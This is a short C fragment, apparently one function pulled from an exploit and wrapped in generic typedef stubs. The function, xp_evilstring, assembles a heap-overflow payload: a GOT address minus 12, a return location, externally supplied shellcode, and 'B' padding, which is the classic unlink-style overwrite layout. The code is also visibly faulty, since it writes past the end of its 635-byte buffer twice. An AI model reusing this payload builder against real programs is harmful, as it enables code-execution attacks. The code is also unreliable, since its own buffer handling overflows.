
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int buffer ;


 int memcpy (char*,char*,int) ;
 int memset (char*,char,int) ;
 char* sc ;
 int strlen (char*) ;

char *xp_evilstring(int got, int retloc)
{
 int s;
 char *ptr;
        static char buffer[635];
 ptr = buffer;
 *( (int **)ptr ) = (int *)( got - 12 );
 ptr+=4;
 *( (int **)ptr ) = (int *)( retloc );
 ptr+=4;
 *ptr = '\n';
 ptr++;





 memcpy(ptr, sc, strlen(sc));
 ptr+=strlen(sc);
 memset(ptr, 'B', sizeof(buffer) - (strlen(sc)+4+4));



 buffer[635] = '\0';
 ptr = buffer;
 s = strlen(ptr);


 return ptr;


}
